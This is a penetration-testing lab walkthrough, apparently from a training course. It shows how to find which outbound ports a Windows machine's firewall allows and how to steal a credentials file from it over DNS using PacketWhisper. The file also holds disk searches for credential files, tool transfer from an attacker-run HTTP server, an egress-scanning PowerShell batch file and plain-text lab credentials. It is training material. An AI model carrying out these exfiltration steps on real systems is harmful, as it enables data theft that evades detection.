


A client gives you remote desktop access to a machine and wants you to identify all the possible ways an attacker can exfiltrate data (that is - if he was able to compromise this machine) without changing any firewall setting.

If you are unfamiliar with the term exfiltration, please refer to the link below.


NoteThis lab, should be performed from inside a Kali Linux, or other pentesting distribution, Virtual Machine.

Learning objectives

In this lab, you will learn how to:

  • Assess firewall settings

  • Leverage insufficiently secure firewall settings

  • Encrypt interesting data and exfiltrate them using DNS

  • Automatically identify all possible exfiltration ways

Recommended tools

Network configuration & credentials

  • Intranet Subnet:

  • Under-investigation machine's IP:

  • Connection Type: RDP

    • Use a Kali Linux or another penetration testing distribution virtual machine to connect to the machine. You can do so by opening a terminal and executing the below:
# rdesktop
  • Credentials

    • Username: AdminELS

    • Password: Nu3pmkfyX


Task 1: Connect to and scrutinize the machine

Use the connection details documented in the Network configuration & credentials section above to connect to the machine.

  • Inspect the machine for any interesting files.

  • Identify all the available scripting languages, which could assist you during your assessment.

Task 2: Identify if the machine allows any of the commonly used ports outbound connectivity

It is not uncommon to find ports such as 80 (TCP), 443 (TCP), 8080 (TCP), 8443 (TCP) and 53 (UDP) being allowed outbound connectivity. Identify if any of those ports are allowed outbound connectivity by the machine's firewall.

Hint: You can use a Python HTTP server or Wireshark (on your Kali machine) and the machine's browser to help you with this task.

Task 3: Try to exfiltrate an interesting file

Try to exfiltrate any interesting file you identified in Task 1 and save it to your Kali machine. To do so, leverage the allowed outbound connectivity ports that you identified during Task 2.


  1. Oftentimes, professional penetration testers exfiltrate data via DNS requests to evade detection.

  2. PacketWhisper is a great tool to perform DNS exfiltration

Task 4: Automate enumerating all the exfiltration paths and identify another one

Guessing or manually identifying exfiltration paths can be a tedious and time-consuming procedure.

Search for automated tools/frameworks that automate the process of identifying all the possible exfiltration paths and use one of them to identify an exfiltration path that is different than the one used in Task 3.


  1. https://github.com/stufus/egresscheck-framework.git is a nice solution to automatically enumerate all the possible exfiltration ways

  2. Another port exists which is allowed outbound connectivity. This port is between 8500 and 9500 (TCP).


Below, you can find solutions for each task. As a reminder, you can follow your own strategy, which may be different from the one explained in the following lab.

Task 1: Connect to and scrutinize the machine

Once you are connected to the machine, launch "cmd.exe" (press the Windows key+r and type cmd.exe). First, search for interesting files, such as password.txtcredentials.txt, etc. by executing the following:

cd /

dir /s /b passwords.txt

dir /s /b credentials.txt
You will see, that acredentials.txtfile exists inside theC:\Documents\Sensitivedirectory. This file contains a username and password.

While you are still inside the Windows terminal (cmd.exe), also check if there are any scripting languages installed.

You can check for PowerShell and Python by executing the below commands:

python --version

powershell ls

You will then see the following:

The successful execution of the above commands indicates that these scripting languages (Python and PowerShell) are actually installed (or allowed) on the machine.

These scripting languages contain useful capabilities that can be leveraged by penetration testers during all phases of a penetration test.

More on that in just a bit...

Task 2: Identify if the machine allows any of the commonly used ports outbound connectivity

To identify if the machine allows any of the commonly used ports outbound connectivity, follow the procedures below.

For ports 80 (TCP), 443 (TCP), 8080 (TCP), 8443 (TCP) the procedure is as follows:

  1. Launch a Python server specifying the port of choice, in your Kali machine.

In order to start a Python server, you need to launch a new terminal; go to a directory in Kali where you have files to be shared (for example /tmp), and then type:

# cd /tmp <- To navigate to the /tmp directory

# python -m SimpleHTTPServer 8080
In this case, port 8080 is open and waiting for connections on your Kali machine, but you can specify any of the 1 - 65,535 ports you want.

As you can imagine, we will be testing if port 8080 (TCP) is allowed outbound internet connectivity by the machine's firewall.

You should see something similar to the below screenshot:

  1. Identify the tap0 IP address of your Kali machine

To see the tap0 IP of your Kali machine, open a new terminal and execute the following:

# ifconfig

You should see something similar to the below.

In this case, the tap0 IP is may be different in your case.

  1. Launch a browser (i.e. Edge) on the machine and navigate to http://[tap0 Kali IP]:port_of_choice

To do so, simply point the browser on the machine to http://[tap0 Kali IP]:8080 (when testing if port 8080 is allowed outbound connectivity) and see if the served by the Python server page loads.

If this is the case, the port is allowed outbound connectivity Otherwise, the firewall is blocking access to this specific port.

In the screenshot below, you should see something similar inside the Edge browser of the machine.

The website will present you with the files of the /tmp directory (if any exist), where the Python server was started. If any files exist, you will be able to download them.

So far, port 8080 (TCP) is one of the ports that are allowed outbound connectivity.

To check ports 443 (TCP) and 8443 (TCP), perform steps 1-3, which are outlined above. Make sure you specify both the tap0 Kali IP and the port you are currently checking (which is bound by the Python Server) each time. You will identify that these ports are not allowed outbound connectivity.

For port 53 (UDP), the procedure is:

Note: If you were inside a real environment, you could simply launch Wireshark and see if you can "sniff" any DNS requests originating from the machine. If this was the case, then port 53 (UDP) would have been allowed outbound connectivity.

Find below an example of such DNS requests (which are irrelevant to this lab, hence the unrelated IPs)

In the context of this lab, you cannot "sniff" DNS requests due to virtualization restrictions. What you can do though, is change the system's DNS settings and configure your Kali machine's tap0 IP as DNS server.

More specifically, to check if port 53 (UDP) is allowed outbound connectivity, execute the below:

  1. Run Wireshark on your Kali machine.

To do so, open a new terminal and execute the below.

# wireshark

In order to capture traffic from the lab's network, click on Capture and select Options, then you will click the "tap0" interface and finally press Start (as indicated in the screenshot below).

  1. Configure the DNS server on the machine to point to your Kali machine's tap0 IP (the same as previously used).

In order to change the DNS settings of the machine, double click the Ethernet0 shortcut that is present on the AdminELS user's Desktop and then:

  • Select Properties

  • Choose Internet Protocol Version 4

From the Internet Protocol Version 4 (TCP/IPv4) Properties window:

  • Choose Properties

  • Insert your Kali's tap0 IP address as preferred DNS and click OK

Launch a browser, and try to navigate to any page (e.g., google.com)

Now, go to your Kali machine where you have started Wireshark. Observe the DNS traffic issued by the machine. You should see something similar to the screenshot below.

Such captured traffic means that the firewall allows DNS traffic outbound (port 53 UDP).

To summarize our activities thus far, we have identified that ports 8080 (TCP) and 53 (UDP) are allowed outbound connectivity.

Task 3: Try to exfiltrate an interesting file

Based on the ports you identified that are allowed outbound connectivity, the stealthier exfiltration way is through port 53 (UDP). PacketWhisper can help you easily exfiltrate data via DNS requests.

PacketWhisper is a Python-based tool, but luckily we identified that Python is installed on the machine.

To begin, download PacketWhisper from github. On Kali Linux, there is a convenient way to do this by using "git clone". More specifically:

  • On your Kali machine, open a new terminal and execute the below.
git clone https://github.com/TryCatchHCF/PacketWhisper.git

The /tmp/server path is the one we chose for our machine. You can execute the commands above inside any directory you want.

For easier transfer, also download PacketWhisper as a zipped file as follows:

# wget https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip

You can then run a Python server in the directory where you saved the zipped version PacketWhisper, specifying the previously identified open port 8080.

# python -m SimpleHTTPServer 8080

Finally, you can again point the browser on the machine to your tap0 IP and port 8080 in order to download the tool.

Remember that the file you want to download must be in the directory inside which you started the Python server.

Now, you can download the compressed PacketWhisper to the desktop for easier access and unzip it by right-clicking on the archive.

(To save you time, we have already downloaded PacketWhisper for you and placed it on the AdminELS user's desktop)

Now it's time to use PacketWhisper. In order to run PacketWhisper:

  • Launch Wireshark on your Kali Machine again and use the "tap0" interface to listen.

  • Launch cmd.exe on the machine and go to the PacketWhisper directory.

  • Copy the credentials.txt file to the PacketWhisper's directory.

  • Launch PacketWhisper.

cd c:\Users\AdminELS\Desktop\PacketWhisper-master\

copy c:\Documents\Sensitive\credentials.txt .\credentials.txt

python packetWhisper.py



[enter] (leave empty)






You should see something similar to the below screenshot, where we can see an example of packet whisper's options:

Transmission will now begin. Wait patiently until the end; it usually takes 15+ minutes to finish the exfiltration.

Once finished, information will appear, which will look similar to the information you see in the screenshot below.

Back to your Kali Linux, on Wireshark you should be able to see DNS queries to subdomains of cloudfront.net within the traffic:

Now, save the Wireshark capture file. Remember to use the .pcap format as per the below screenshot.

Next, copy the saved pcap file inside the PacketWhisper's directory (in this case it's named file.pcap)

Finally, open a new terminal and go to PacketWhisper's directory and execute the following.

python PacketWhisper.py







The file should now be successfully decrypted. To view its content, you can execute the below, or double-click the decloaked.file file.

# cat decloaked.file

Task 4: Automate enumerating all the exfiltration paths and identify another one

During penetration tests, we need to automate a large portion of our commonly executed activities to save time.

Let's use the egresscheck framework to see how it can automate identifying the ports that are allowed outbound connectivity.

There might be another port which is allowed outbound connectivity that we missed.

To download and launch the egresscheck framework, execute the below inside any directory you want on your Kali machine.

# git clone https://github.com/stufus/egresscheck-framework.git

# cd egresscheck-framework/

# ./ecf.py

You need to configure the tool by specifying:

  • The tap0 IP of your Kali machine (TARGETIP)

  • The machine's IP (SOURCEIP)

  • A port range (PORTS)

  • The protocol (PROTOCOL)

You can do so, as follows:

egresschecker> set PORTS 8500-9500
PORTS => 8500-9500 (1001 ports)

egresschecker> set TARGETIP

egresschecker> set SOURCEIP

egresschecker> set PROTOCOL tcp
egresschecker> generate powershell-cmd
Thegenerate powershell-cmdwe see above was executed in order to get a single PowerShell command that will help us automate the firewall assessment.

This encrypted command contains code that will make PowerShell try to access every port from the given range from the machine on your Kali machine.

Before initiating this procedure on the machine, the following requirements should be fulfilled:

  • Transfer this command to the machine

  • Run Wireshark on your Kali Machine

  • Execute the command on the machine

You can transfer the command using the Python server, and port 8080 like you did previously.

To do so, first, go to the directory where the egresscheck framework generated a BAT file (see the purple text message in the image above)

Egresscheck informs you of this BAT file with a message, which will be similar to the one below:

"Also written to: /tmp/egress_2019jan16_125152_VNcIt8.bat"

To serve this file using the Python server, execute the following:

# cd tmp
# python -m SimpleHTTPServer 8080
Now, go to the machine and point the browser to http://[tap0 Kali IP]:8080 again.

Download the .bat file generated by the egress framework.

Next, go back to your Kali machine, execute Wireshark again and point it to listen on the tap0 interface.

Finally, right-click the downloaded BAT file on the machine and click "Run as administrator."

A similar window to the one below will pop up. In the meantime, go to Wireshark on your Kali machine and observe the traffic.

After a short period of time, Wireshark will receive a packet destined to port 9000 - which means that this port is also allowed outbound connectivity on the machine's firewall; this is the third and last port which is allowed outbound connectivity.


Lab Not Running

info_outlineLAB NOT RUNNING

Start the lab and you’ll be able to download a VPN File and connect.


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